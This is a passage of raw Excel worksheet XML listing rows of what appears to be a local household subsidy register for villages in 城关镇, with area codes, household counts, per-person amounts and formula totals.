        <v>650</v>
      </c>
      <c r="J81" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K81" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="82" customHeight="1" spans="1:11">
      <c r="A82" s="23" t="s">
        <v>443</v>
      </c>
      <c r="B82" s="24" t="str">
        <f>B81</f>
        <v>城关镇</v>
      </c>
      <c r="C82" s="24" t="str">
        <f>C81</f>
        <v>北外村</v>
      </c>
      <c r="D82" s="23" t="s">
        <v>444</v>
      </c>
      <c r="E82" s="23" t="s">
        <v>445</v>
      </c>
      <c r="F82" s="24" t="str">
        <f>F81</f>
        <v>4113210102</v>
      </c>
      <c r="G82" s="24"/>
      <c r="H82" s="24"/>
      <c r="I82" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J82" s="24"/>
      <c r="K82" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="83" customHeight="1" spans="1:11">
      <c r="A83" s="23" t="s">
        <v>446</v>
      </c>
      <c r="B83" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C83" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D83" s="24" t="s">
        <v>447</v>
      </c>
      <c r="E83" s="24" t="s">
        <v>448</v>
      </c>
      <c r="F83" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G83" s="24">
        <v>1</v>
      </c>
      <c r="H83" s="25">
        <v>365</v>
      </c>
      <c r="I83" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J83" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K83" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="84" customHeight="1" spans="1:11">
      <c r="A84" s="23" t="s">
        <v>449</v>
      </c>
      <c r="B84" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C84" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D84" s="24" t="s">
        <v>450</v>
      </c>
      <c r="E84" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F84" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G84" s="24">
        <v>1</v>
      </c>
      <c r="H84" s="25">
        <v>365</v>
      </c>
      <c r="I84" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J84" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K84" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="85" customHeight="1" spans="1:11">
      <c r="A85" s="23" t="s">
        <v>451</v>
      </c>
      <c r="B85" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C85" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D85" s="24" t="s">
        <v>452</v>
      </c>
      <c r="E85" s="24" t="s">
        <v>453</v>
      </c>
      <c r="F85" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G85" s="24">
        <v>1</v>
      </c>
      <c r="H85" s="25">
        <v>365</v>
      </c>
      <c r="I85" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J85" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K85" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="86" customHeight="1" spans="1:11">
      <c r="A86" s="23" t="s">
        <v>454</v>
      </c>
      <c r="B86" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C86" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D86" s="24" t="s">
        <v>455</v>
      </c>
      <c r="E86" s="24" t="s">
        <v>456</v>
      </c>
      <c r="F86" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G86" s="24">
        <v>1</v>
      </c>
      <c r="H86" s="25">
        <v>365</v>
      </c>
      <c r="I86" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J86" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K86" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="87" customHeight="1" spans="1:11">
      <c r="A87" s="23" t="s">
        <v>457</v>
      </c>
      <c r="B87" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C87" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D87" s="24" t="s">
        <v>458</v>
      </c>
      <c r="E87" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F87" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G87" s="24">
        <v>1</v>
      </c>
      <c r="H87" s="25">
        <v>365</v>
      </c>
      <c r="I87" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J87" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K87" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="88" customHeight="1" spans="1:11">
      <c r="A88" s="23" t="s">
        <v>459</v>
      </c>
      <c r="B88" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C88" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D88" s="24" t="s">
        <v>460</v>
      </c>
      <c r="E88" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F88" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G88" s="24">
        <v>2</v>
      </c>
      <c r="H88" s="25">
        <v>325</v>
      </c>
      <c r="I88" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J88" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K88" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="89" customHeight="1" spans="1:11">
      <c r="A89" s="23" t="s">
        <v>461</v>
      </c>
      <c r="B89" s="24" t="str">
        <f>B88</f>
        <v>城关镇</v>
      </c>
      <c r="C89" s="24" t="str">
        <f>C88</f>
        <v>中华村</v>
      </c>
      <c r="D89" s="23" t="s">
        <v>462</v>
      </c>
      <c r="E89" s="23" t="s">
        <v>312</v>
      </c>
      <c r="F89" s="24" t="str">
        <f>F88</f>
        <v>4113210108</v>
      </c>
      <c r="G89" s="24"/>
      <c r="H89" s="24"/>
      <c r="I89" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J89" s="24"/>
      <c r="K89" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="90" customHeight="1" spans="1:11">
      <c r="A90" s="23" t="s">
        <v>463</v>
      </c>
      <c r="B90" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C90" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D90" s="24" t="s">
        <v>464</v>
      </c>
      <c r="E90" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F90" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G90" s="24">
        <v>2</v>
      </c>
      <c r="H90" s="25">
        <v>325</v>
      </c>
      <c r="I90" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J90" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K90" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="91" customHeight="1" spans="1:11">
      <c r="A91" s="23" t="s">
        <v>465</v>
      </c>
      <c r="B91" s="24" t="str">
        <f>B90</f>
        <v>城关镇</v>
      </c>
      <c r="C91" s="24" t="str">
        <f>C90</f>
        <v>东北六组</v>
      </c>
      <c r="D91" s="23" t="s">
        <v>466</v>
      </c>
      <c r="E91" s="23" t="s">
        <v>467</v>
      </c>
      <c r="F91" s="24" t="str">
        <f>F90</f>
        <v>4113210103</v>
      </c>
      <c r="G91" s="24"/>
      <c r="H91" s="24"/>
      <c r="I91" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J91" s="24"/>
      <c r="K91" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="92" customHeight="1" spans="1:11">
      <c r="A92" s="23" t="s">
        <v>468</v>
      </c>
      <c r="B92" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C92" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D92" s="24" t="s">
        <v>469</v>
      </c>
      <c r="E92" s="24" t="s">
        <v>312</v>
      </c>
      <c r="F92" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G92" s="24">
        <v>1</v>
      </c>
      <c r="H92" s="25">
        <v>365</v>
      </c>
      <c r="I92" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J92" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K92" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="93" customHeight="1" spans="1:11">
      <c r="A93" s="23" t="s">
        <v>470</v>
      </c>
      <c r="B93" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C93" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D93" s="24" t="s">
        <v>471</v>
      </c>
      <c r="E93" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F93" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G93" s="24">
        <v>2</v>
      </c>
      <c r="H93" s="25">
        <v>355</v>
      </c>
      <c r="I93" s="24">
        <f t="shared" si="1"/>
        <v>710</v>
      </c>
      <c r="J93" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K93" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="94" customHeight="1" spans="1:11">
      <c r="A94" s="23" t="s">
        <v>472</v>
      </c>
      <c r="B94" s="24" t="str">
        <f>B93</f>
        <v>城关镇</v>
      </c>
      <c r="C94" s="24" t="str">
        <f>C93</f>
        <v>西北村</v>
      </c>
      <c r="D94" s="26" t="s">
        <v>473</v>
      </c>
      <c r="E94" s="26" t="s">
        <v>474</v>
      </c>
      <c r="F94" s="24" t="str">
        <f>F93</f>
        <v>4113210106</v>
      </c>
      <c r="G94" s="24"/>
      <c r="H94" s="24"/>
      <c r="I94" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J94" s="24"/>
      <c r="K94" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="95" customHeight="1" spans="1:11">
      <c r="A95" s="23" t="s">
        <v>475</v>
      </c>
      <c r="B95" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C95" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D95" s="24" t="s">
        <v>476</v>
      </c>
      <c r="E95" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F95" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G95" s="24">
        <v>1</v>
      </c>
      <c r="H95" s="25">
        <v>365</v>
      </c>
      <c r="I95" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J95" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K95" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="96" customHeight="1" spans="1:11">
      <c r="A96" s="23" t="s">
        <v>477</v>
      </c>
      <c r="B96" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C96" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D96" s="24" t="s">
        <v>478</v>
      </c>
      <c r="E96" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F96" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G96" s="24">
        <v>2</v>
      </c>
      <c r="H96" s="25">
        <v>325</v>
      </c>
      <c r="I96" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J96" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K96" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="97" customHeight="1" spans="1:11">
      <c r="A97" s="23" t="s">
        <v>480</v>
      </c>
      <c r="B97" s="24" t="str">
        <f>B96</f>
        <v>城关镇</v>
      </c>
      <c r="C97" s="24" t="str">
        <f>C96</f>
        <v>北外村</v>
      </c>
      <c r="D97" s="23" t="s">
        <v>481</v>
      </c>
      <c r="E97" s="23" t="s">
        <v>303</v>
      </c>
      <c r="F97" s="24" t="str">
        <f>F96</f>
        <v>4113210102</v>
      </c>
      <c r="G97" s="24"/>
      <c r="H97" s="24"/>
      <c r="I97" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J97" s="24"/>
      <c r="K97" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="98" customHeight="1" spans="1:11">
      <c r="A98" s="23" t="s">
        <v>482</v>
      </c>
      <c r="B98" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C98" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D98" s="24" t="s">
        <v>483</v>
      </c>
      <c r="E98" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F98" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G98" s="24">
        <v>2</v>
      </c>
      <c r="H98" s="25">
        <v>325</v>
      </c>
      <c r="I98" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J98" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K98" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="99" customHeight="1" spans="1:11">
      <c r="A99" s="23" t="s">
        <v>484</v>
      </c>
      <c r="B99" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C99" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D99" s="23" t="s">
        <v>485</v>
      </c>
      <c r="E99" s="23" t="s">
        <v>486</v>
      </c>
      <c r="F99" s="24" t="str">
        <f>F98</f>
        <v>4113210106</v>
      </c>
      <c r="G99" s="24"/>
      <c r="H99" s="24"/>
      <c r="I99" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J99" s="24"/>
      <c r="K99" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="100" customHeight="1" spans="1:11">
      <c r="A100" s="23" t="s">
        <v>487</v>
      </c>
      <c r="B100" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C100" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D100" s="24" t="s">
        <v>488</v>
      </c>
      <c r="E100" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F100" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G100" s="24">
        <v>1</v>
      </c>
      <c r="H100" s="25">
        <v>365</v>
      </c>
      <c r="I100" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J100" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K100" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="101" customHeight="1" spans="1:11">
      <c r="A101" s="23" t="s">
        <v>489</v>
      </c>
      <c r="B101" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C101" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D101" s="24" t="s">
        <v>490</v>
      </c>
      <c r="E101" s="24" t="s">
        <v>491</v>
      </c>
      <c r="F101" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G101" s="24">
        <v>1</v>
      </c>
      <c r="H101" s="25">
        <v>365</v>
      </c>
      <c r="I101" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J101" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K101" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="102" customHeight="1" spans="1:11">
      <c r="A102" s="23" t="s">
        <v>492</v>
      </c>
      <c r="B102" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C102" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D102" s="24" t="s">
        <v>493</v>
      </c>
      <c r="E102" s="24" t="s">
        <v>494</v>
      </c>
      <c r="F102" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G102" s="24">
        <v>1</v>
      </c>
      <c r="H102" s="25">
        <v>365</v>
      </c>
      <c r="I102" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J102" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K102" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="103" customHeight="1" spans="1:11">
      <c r="A103" s="23" t="s">
        <v>495</v>
      </c>
      <c r="B103" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C103" s="24" t="s">
        <v>247</v>
      </c>
      <c r="D103" s="24" t="s">
        <v>496</v>
      </c>
      <c r="E103" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F103" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G103" s="24">
        <v>1</v>
      </c>
      <c r="H103" s="25">
        <v>365</v>
      </c>
      <c r="I103" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J103" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K103" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="104" customHeight="1" spans="1:11">
      <c r="A104" s="23" t="s">
        <v>498</v>
      </c>
      <c r="B104" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C104" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D104" s="24" t="s">
        <v>499</v>
      </c>
      <c r="E104" s="24" t="s">
        <v>500</v>
      </c>
      <c r="F104" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G104" s="24">
        <v>1</v>
      </c>
      <c r="H104" s="25">
        <v>365</v>
      </c>
      <c r="I104" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J104" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K104" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="105" customHeight="1" spans="1:11">
      <c r="A105" s="23" t="s">
        <v>501</v>
      </c>
      <c r="B105" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C105" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D105" s="24" t="s">
        <v>502</v>
      </c>
      <c r="E105" s="24" t="s">
        <v>503</v>
      </c>
      <c r="F105" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G105" s="24">
        <v>1</v>
      </c>
      <c r="H105" s="25">
        <v>365</v>
      </c>
      <c r="I105" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J105" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K105" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="106" customHeight="1" spans="1:11">
      <c r="A106" s="23" t="s">
        <v>504</v>
      </c>
      <c r="B106" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C106" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D106" s="24" t="s">
        <v>505</v>
      </c>
      <c r="E106" s="24" t="s">
        <v>506</v>
      </c>
      <c r="F106" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G106" s="24">
        <v>2</v>
      </c>
      <c r="H106" s="25">
        <v>325</v>
      </c>
      <c r="I106" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J106" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K106" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="107" customHeight="1" spans="1:11">
      <c r="A107" s="23" t="s">
        <v>507</v>
      </c>
      <c r="B107" s="24" t="str">
        <f>B106</f>
        <v>城关镇</v>
      </c>
      <c r="C107" s="24" t="str">
        <f>C106</f>
        <v>中华村</v>
      </c>
      <c r="D107" s="23" t="s">
        <v>508</v>
      </c>
      <c r="E107" s="23" t="s">
        <v>509</v>
      </c>
      <c r="F107" s="24" t="str">
        <f>F106</f>
        <v>4113210108</v>
      </c>
      <c r="G107" s="24"/>
      <c r="H107" s="24"/>
      <c r="I107" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J107" s="24"/>
      <c r="K107" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="108" customHeight="1" spans="1:11">
      <c r="A108" s="23" t="s">
        <v>510</v>
      </c>
      <c r="B108" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C108" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D108" s="24" t="s">
        <v>511</v>
      </c>
      <c r="E108" s="24" t="s">
        <v>512</v>
      </c>
      <c r="F108" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G108" s="24">
        <v>2</v>
      </c>
      <c r="H108" s="25">
        <v>325</v>
      </c>
      <c r="I108" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J108" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K108" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="109" customHeight="1" spans="1:11">
      <c r="A109" s="23" t="s">
        <v>513</v>
      </c>
      <c r="B109" s="24" t="str">
        <f>B108</f>
        <v>城关镇</v>
      </c>
      <c r="C109" s="24" t="str">
        <f>C108</f>
        <v>北外村</v>
      </c>
      <c r="D109" s="27" t="s">
        <v>514</v>
      </c>
      <c r="E109" s="27" t="s">
        <v>269</v>
      </c>
      <c r="F109" s="24" t="str">
        <f>F108</f>
        <v>4113210102</v>
      </c>
      <c r="G109" s="24"/>
      <c r="H109" s="24"/>
      <c r="I109" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J109" s="24"/>
      <c r="K109" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="110" customHeight="1" spans="1:11">
      <c r="A110" s="23" t="s">
        <v>515</v>
      </c>
      <c r="B110" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C110" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D110" s="24" t="s">
        <v>516</v>
      </c>
      <c r="E110" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F110" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G110" s="24">
        <v>1</v>
      </c>
      <c r="H110" s="25">
        <v>365</v>
      </c>
      <c r="I110" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J110" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K110" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="111" customHeight="1" spans="1:11">
      <c r="A111" s="23" t="s">
        <v>517</v>
      </c>
      <c r="B111" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C111" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D111" s="24" t="s">
        <v>518</v>
      </c>
      <c r="E111" s="24" t="s">
        <v>519</v>
      </c>
      <c r="F111" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G111" s="24">
        <v>2</v>
      </c>
      <c r="H111" s="25">
        <v>325</v>
      </c>
      <c r="I111" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J111" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K111" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="112" customHeight="1" spans="1:11">
      <c r="A112" s="23" t="s">
        <v>520</v>
      </c>
      <c r="B112" s="24" t="str">
        <f>B111</f>
        <v>城关镇</v>
      </c>
      <c r="C112" s="24" t="str">
        <f>C111</f>
        <v>中华村</v>
      </c>
      <c r="D112" s="23" t="s">
        <v>521</v>
      </c>
      <c r="E112" s="23" t="s">
        <v>312</v>
      </c>
      <c r="F112" s="24" t="str">
        <f>F111</f>
        <v>4113210108</v>
      </c>
      <c r="G112" s="24"/>
      <c r="H112" s="24"/>
      <c r="I112" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J112" s="24"/>
      <c r="K112" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="113" customHeight="1" spans="1:11">
      <c r="A113" s="23" t="s">
        <v>522</v>
      </c>
      <c r="B113" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C113" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D113" s="24" t="s">
        <v>523</v>
      </c>
      <c r="E113" s="24" t="s">
        <v>524</v>
      </c>
      <c r="F113" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G113" s="24">
        <v>1</v>
      </c>
      <c r="H113" s="25">
        <v>365</v>
      </c>
      <c r="I113" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J113" s="24" t="s">
        <v>525</v>
      </c>
      <c r="K113" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="114" customHeight="1" spans="1:11">
      <c r="A114" s="23" t="s">
        <v>526</v>
      </c>
      <c r="B114" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C114" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D114" s="24" t="s">
        <v>527</v>
      </c>
      <c r="E114" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F114" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G114" s="24">
        <v>2</v>
      </c>
      <c r="H114" s="25">
        <v>325</v>
      </c>
      <c r="I114" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J114" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K114" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="115" customHeight="1" spans="1:11">
      <c r="A115" s="23" t="s">
        <v>528</v>
      </c>
      <c r="B115" s="24" t="str">
        <f>B114</f>
        <v>城关镇</v>
      </c>
      <c r="C115" s="24" t="str">
        <f>C114</f>
        <v>中华村</v>
      </c>
      <c r="D115" s="23" t="s">
        <v>529</v>
      </c>
      <c r="E115" s="23" t="s">
        <v>249</v>
      </c>
      <c r="F115" s="24" t="str">
        <f>F114</f>
        <v>4113210108</v>
      </c>
      <c r="G115" s="24"/>
      <c r="H115" s="24"/>
      <c r="I115" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J115" s="24"/>
      <c r="K115" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="116" customHeight="1" spans="1:11">
      <c r="A116" s="23" t="s">
        <v>530</v>
      </c>
      <c r="B116" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C116" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D116" s="24" t="s">
        <v>531</v>
      </c>
      <c r="E116" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F116" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G116" s="24">
        <v>2</v>
      </c>
      <c r="H116" s="25">
        <v>325</v>
      </c>
      <c r="I116" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J116" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K116" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="117" customHeight="1" spans="1:11">
      <c r="A117" s="23" t="s">
        <v>532</v>
      </c>
      <c r="B117" s="24" t="str">
        <f>B116</f>
        <v>城关镇</v>
      </c>
      <c r="C117" s="24" t="str">
        <f>C116</f>
        <v>西北村</v>
      </c>
      <c r="D117" s="23" t="s">
        <v>533</v>
      </c>
      <c r="E117" s="23" t="s">
        <v>303</v>
      </c>
      <c r="F117" s="24" t="str">
        <f>F116</f>
        <v>4113210106</v>
      </c>
      <c r="G117" s="24"/>
      <c r="H117" s="24"/>
      <c r="I117" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J117" s="24"/>
      <c r="K117" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="118" customHeight="1" spans="1:11">
      <c r="A118" s="23" t="s">
        <v>534</v>
      </c>
      <c r="B118" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C118" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D118" s="24" t="s">
        <v>535</v>
      </c>
      <c r="E118" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F118" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G118" s="24">
        <v>1</v>
      </c>
      <c r="H118" s="25">
        <v>365</v>
      </c>
      <c r="I118" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J118" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K118" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="119" customHeight="1" spans="1:11">
      <c r="A119" s="23" t="s">
        <v>536</v>
      </c>
      <c r="B119" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C119" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D119" s="24" t="s">
        <v>537</v>
      </c>
      <c r="E119" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F119" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G119" s="24">
        <v>3</v>
      </c>
      <c r="H119" s="25">
        <v>290</v>
      </c>
      <c r="I119" s="24">
        <f t="shared" si="1"/>
        <v>870</v>
      </c>
      <c r="J119" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K119" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="120" customHeight="1" spans="1:11">
      <c r="A120" s="23" t="s">
        <v>538</v>
      </c>
      <c r="B120" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C120" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D120" s="23" t="s">
        <v>539</v>
      </c>
      <c r="E120" s="23" t="s">
        <v>540</v>
      </c>
      <c r="F120" s="24" t="str">
        <f>F119</f>
        <v>4113210106</v>
      </c>
      <c r="G120" s="24"/>
      <c r="H120" s="24"/>
      <c r="I120" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J120" s="24"/>
      <c r="K120" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="121" customHeight="1" spans="1:11">
      <c r="A121" s="23" t="s">
        <v>541</v>
      </c>
      <c r="B121" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C121" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D121" s="23" t="s">
        <v>542</v>
      </c>
      <c r="E121" s="23" t="s">
        <v>543</v>
      </c>
      <c r="F121" s="24" t="str">
        <f>F120</f>
        <v>4113210106</v>
      </c>
      <c r="G121" s="24"/>
      <c r="H121" s="24"/>
      <c r="I121" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J121" s="24"/>
      <c r="K121" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="122" customHeight="1" spans="1:11">
      <c r="A122" s="23" t="s">
        <v>544</v>
      </c>
      <c r="B122" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C122" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D122" s="24" t="s">
        <v>545</v>
      </c>
      <c r="E122" s="24" t="s">
        <v>402</v>
      </c>
